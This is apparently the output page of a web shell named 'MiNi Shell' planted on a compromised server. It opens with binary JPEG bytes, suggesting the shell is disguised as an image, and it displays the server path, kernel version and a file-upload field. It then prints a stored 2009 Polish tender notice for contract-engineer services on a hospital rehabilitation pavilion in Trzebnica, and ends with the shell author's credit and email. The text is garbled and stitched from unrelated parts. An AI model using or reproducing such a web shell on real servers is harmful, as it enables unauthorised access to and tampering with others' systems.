JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090812/276542-N-2009.html

<p class="kh_header"><b>Trzebnica: na usługi Inżyniera Kontraktu (Inwestora Zastępczego) w ramach projektu p.n.
Rozbudowa Szpitala im. Św. Jadwigi Śląskiej w Trzebnicy - pawilon dla Oddziału Rehabilitacji, zlokalizowanego przy ul. Prusickiej 53 55 w Trzebnicy; 
współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013,</b><br>
<b>Numer ogłoszenia: 276542 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Trzebnicki , ul. Ks. Dz. W. Bochenka 6, 55-100 Trzebnica, tel. 071 3120901 w. 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.trzebnica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na usługi Inżyniera Kontraktu (Inwestora Zastępczego) w ramach projektu p.n.
Rozbudowa Szpitala im. Św. Jadwigi Śląskiej w Trzebnicy - pawilon dla Oddziału Rehabilitacji, zlokalizowanego przy ul. Prusickiej 53 55 w Trzebnicy; 
współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonywanie usługi Inżyniera Kontraktu (Inwestora Zastępczego) w ramach projektu Rozbudowa Szpitala im. Św. Jadwigi Śląskiej w Trzebnicy - pawilon dla Oddziału Rehabilitacji, zlokalizowanego przy ul. Prusickiej 53 55 w Trzebnicy. 
Zamówienie obejmuje: usługi nadzoru budowlanego, usługi zarządzania budową, usługi profesjonalne w zakresie architektury, inżynierii, budowy, prawa, księgowości oraz inne, usługi kontroli i nadzoru technicznego, usługi zarządzania projektem budowlanym, usługi nadzorowania placu budowy.

2. Świadczący usługi Inżyniera Kontraktu (Inwestora Zastępczego) zobowiązany będzie do:
 
2.1. Zarządzania, kontroli i sprawowania nadzoru nad realizacją robót budowlanych w zakresie wszystkich specjalności, jakie są niezbędne do prowadzenia inwestycji w ramach przedmiotowego projektu w oparciu o przepisy ustawy Prawo budowlane.
2.2. Prowadzenie dokumentacji finansowej w tym przygotowywanie i przekazywanie wszelkiej sprawozdawczości, sporządzanie okresowych wniosków o płatność przez cały okres realizacji inwestycji, sporządzanie raportów z realizacji projektu i innych dokumentów wynikających z umowy zawartej z Instytucją Zarządzającą wraz z wnioskiem o dofinansowanie oraz z wytycznych Instytucji Zarządzającej i innych instytucji uprawnionych do wydawania wytycznych.

3. Do podstawowych obowiązków Inżyniera Kontraktu (Inwestora Zastępczego) należy w szczególności:
3.1. Pełnienie funkcji inspektora nadzoru nad wszystkimi branżami zgodnie z przepisami ustawy - Prawo Budowlane,
3.2. Prowadzenie w imieniu Zamawiającego procesu inwestycyjnego wraz z rozliczeniem inwestycji,
3.3. Przyjęcie od Zamawiającego wszelkich obowiązków formalno- prawnych związanych z realizacją inwestycji,
3.4. Przygotowanie i organizacja przetargu na dostawców wyposażenia,
3.5. Sporządzenie projektu umowy z dostawcami,
3.6. Przekazanie wykonawcy kompletnej dokumentacji oraz terenu budowy,
3.7. Uzgodnienie harmonogramu realizacji inwestycji z wyłonionym wykonawcą,
3.8. Nadzór nad zapewnieniem bezpieczeństwa i przestrzegania przepisów p.poż., bezpieczeństwa i higieny pracy, przez wszystkich uczestników procesu inwestycyjnego, w rozumieniu wymagań stawianych przez Prawo budowlane i inne przepisy normatywne w tym zakresie, podczas realizacji inwestycji,
3.9. Przekazywanie projektantowi zastrzeżeń, co do rozwiązań projektowych zgłoszonych przez wykonawcę robót lub Zamawiającego i dokonywanie z nim stosownych uzgodnień lub wyjaśnień,
3.10 .Organizowanie i prowadzenie spotkań koordynacyjnych mających na celu usprawnienie procesu realizacji inwestycji,
3.11. Kontrola badań jakości robót i prawidłowości zastosowanych materiałów
3.12. Nadzór nad terminowością wykonywanego zadania zgodnie z zatwierdzonym harmonogramem prac
3.13. Naliczanie i egzekwowanie kar umownych od wykonawcy robót
3.14. Dokonywanie:
a)	odbiorów robót zanikowych,
b)	odbiorów częściowych,
c)	odbioru końcowego,
d)	odbiorów pogwarancyjnych,
3.15. Sporządzanie comiesięcznych pisemnych raportów rzeczowo-finansowych z realizacji inwestycji,
3.16. Prowadzenie dokumentacji finansowej przedsięwzięcia i rozliczeń z Funduszem
3.17. Występowanie w imieniu Zamawiającego przez organami administracji i przez sądami, w sprawach wynikających z realizacji zadania, w granicach udzielonych pełnomocnictw,
3.18. Rozliczenie końcowe zadania i uzyskanie decyzji o zezwoleniu na użytkowanie obiektu,
3.19. Archiwizację korespondencji i dokumentacji oraz przekazanie ich po zakończeniu inwestycji lub rozwiązaniu umowy z Zamawiającym,
4. Wykonawca zobowiązany jest do zapewnienia we własnym zakresie  i na własny koszt organizacji i prowadzenia biura zespołu Inżyniera Kontraktu w sposób umożliwiający należyte wywiązywanie się ze swych obowiązków.
5. Wszystkie czynności Wykonawca wykonuje w imieniu i na rachunek Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.70.00-1, 71.52.00.00-9, 71.63.00.00-3, 79.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 5 000 zł. (słownie: pięć tysięcy zł).
2. Wadium może być wniesione w następujących formach:
- pieniężnej (przelewem z konta Wykonawcy na konto Zamawiającego),
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).

3. W przypadku złożenia wadium w formie pieniężnej, wadium należy wnieść przelewem na konto Starostwa Powiatowego w Trzebnicy: 
Bank Spółdzielczy w Trzebnicy, nr: 40 9591 0004 2001 0000 4196 0003. 
Wadium winno być na koncie Zamawiającego nie później niż przed upływem terminu składania ofert. Dowód potwierdzenia złożenia wadium należy załączyć do oferty.

4. W przypadku złożenia wadium w formie gwarancji, poręczeń, oryginał dokumentu należy złożyć nie później niż przed upływem terminu składania ofert w siedzibie Zamawiającego w Wydziale Finansowym pok. nr 12. Kopię dokumentu, należy dołączyć do oferty, z uwzględnieniem pkt 5. 

5. Jeśli Wykonawca prześle ofertę pocztą kopię dowodu wniesienia wadium należy załączyć do oferty, natomiast oryginał umieścić w kopercie opisanej  oryginał dowodu wniesienia wadium. 

6. Zamawiający jest obowiązany niezwłocznie zwrócić wadium, jeżeli:
- upłynął termin związania ofertą;
- zawarto umowę i wniesiono zabezpieczenie należytego wykonania umowy,
- zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich składania.

7. Zamawiający zwróci wadium niezwłocznie, na pisemny wniosek Wykonawcy z zastrzeżeniem pkt. 10:
- który wycofał ofertę przed upływem terminu składania ofert,
- który został wykluczony z postępowania,
 -którego oferta została odrzucona.
7.1. Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na ich wniosek w wyniku wykluczenia ich z postępowania lub odrzucenia ich oferty, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
 
8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.

9. Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego w przypadku, gdy:
- odmówił podpisania umowy na warunkach określonych w ofercie,
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP nie złożył dokumentów, oświadczeń lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nie leżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z ubiegania się o zamówienie na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.

Wykonawcy muszą spełniać minimum następujące warunki, tj.:
1.1. Posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
 - złożą stosowne dokumenty wymienione w Rozdziale 6 SIWZ
1.2. Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. Warunek zostanie spełniony, o ile:
1.2.1 Wykonawca wykaże, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, co najmniej 2 usługi pełnienia funkcji Inwestora Zastępczego robót budowlanych  na kontrakcie zakończonym, o wartości nie mniejszej niż 10.000.000 PLN (brutto).
1.2.2. Wykonawca wykaże, że dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
Zamawiający wymaga wskazania następujących osób:
  a)	Kierownika zespołu prowadzącego nadzór budowlany nad przedmiotową inwestycją posiadającego:
-	wykształcenie wyższe,
-	10-letnie doświadczenie w nadzorze budowlanym, w tym, co najmniej 1 na kontrakcie obejmującym nadzór nad robotą budowlaną o wartości 10.000.000 PLN brutto,
-	uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,
-	wpis na listę członków właściwej izby samorządu zawodowego.
b)	inspektora nadzoru w specjalności konstrukcyjno-budowlanej posiadającego:
-	10-letnie doświadczenie zawodowe w pełnieniu funkcji inspektora nadzoru robót budowlanych, w tym, co najmniej 1 na kontrakcie obejmującym roboty budowlane o wartości 10.000.000 PLN brutto,
-	uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,
-	wpis na listę członków właściwej izby samorządu zawodowego.
c)	inspektora nadzoru w specjalności sanitarnej posiadającego:
-	10-letnie doświadczenie zawodowe w pełnieniu funkcji inspektora nadzoru robót z zakresu robót sanitarnych, w tym, co najmniej 1 na kontrakcie obejmującym roboty budowlane o wartości  10.000.000 PLN brutto,
-	uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
-	wpis na listę członków właściwej izby samorządu zawodowego
d)	inspektora nadzoru w specjalności elektrycznej posiadającego:
-	10-letnie doświadczenie zawodowe w pełnieniu funkcji inspektora nadzoru robót z zakresu robót elektrycznych i elektroenergetycznych, w tym, co najmniej 1 na kontrakcie obejmującym roboty budowlane o wartości 10.000.000 PLN brutto,
-	uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
-	wpis na listę członków właściwej izby samorządu zawodowego.
Uwaga!
Zamawiający dopuszcza pełnienie przez jedną osobę jednocześnie funkcji kierownika zespołu i inspektora nadzoru w specjalności konstrukcyjno-budowlanej pod warunkiem jednoczesnego posiadania odpowiedniego wykształcenia, doświadczenia i uprawnień.
e)	specjalistę w zakresie finansów publicznych posiadającego:
-	wykształcenie wyższe,
-	5-letnie doświadczenie w przeprowadzaniu audytów lub kontroli finansowych w jednostkach sektora finansów publicznych
f)	specjalistę w zakresie zamówień publicznych posiadającego:
-	wykształcenie wyższe,
-	5-letnie doświadczenie w stosowaniu przepisów ustawy Prawo zamówień publicznych 

1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym: posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1.000.000,00 zł. 
1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia - złożą stosowne Oświadczenie (Załącznik nr 2 do SIWZ)

2. Ocena spełniania warunków udziału w postępowaniu będzie dokonana zgodnie z formułą spełnia  nie spełnia na podstawie analizy oświadczeń i dokumentów załączonych do oferty, wyszczególnionych w pkt 6 niniejszej SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy zobowiązani są dołączyć do oferty: 

1. W celu potwierdzenia, ze Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz że nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych:
1.1 Aktualny odpis z właściwego rejestru lub aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.2. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, iż Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.3. Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub KRUS potwierdzające, iż Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.4. Oświadczenie, że Wykonawca spełnia warunku udziału w postępowaniu określone w art. 22 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych oraz że nie podlega on wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, złożone na druku stanowiącym Załącznik nr 2 do SIWZ. 

2. W celu potwierdzenia, ze Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub posiada zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
2.1. Wykaz wykonanych usług w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia - co najmniej 1 usługa pełnienia funkcji Inwestora Zastępczego robót budowlanych na kontrakcie zakończonym o wartości nie mniejszej niż 10.000.000,00PLN (brutto), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów, ze usługi te zostały wykonane należycie - Załącznik nr 4 do SIWZ wraz z dokumentami potwierdzającymi należyte wykonanie usługi/usług. 
2.2. Wykaz osób (wzór stanowi załącznik Nr 3 do SIWZ), którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności
2.3. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (osoby wymienione w Załączniku nr 3 do SIWZ), posiadają uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej, uprawnienia budowlane do nadzorowania robót bez ograniczeń w specjalności, instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz w zakresie instalacji i urządzeń elektrycznych, określone przepisami ustawy Prawo budowlane, zaświadczenie o przynależności do właściwej izby samorządu zawodowego.
Uwaga! 
W celu potwierdzenia zobowiązania innych podmiotów wykonawca jest zobowiązany przedłożyć pisemne zobowiązanie tych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

3. W celu potwierdzenia, ze Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
3.1. Polisa, a przypadku jej braku inny dokument potwierdzający, ze Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1.000.000,00zł.

4. Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
 
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt 1 ppkt 1.1 - 1.3, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne albo ze uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie przed notariuszem, właściwym organem sadowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Podstawa prawna: Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane wraz z późniejszymi zmianami..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.trzebnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Trzebnicy ul.Ks.Dz.W.Bochenka 6, 55-100 Trzebnica pok.32.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 12:00, miejsce: Starostwo Powiatowe w Trzebnicy ul.Ks.Dz.W.Bochenka 6, 55-100 Trzebnica , sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com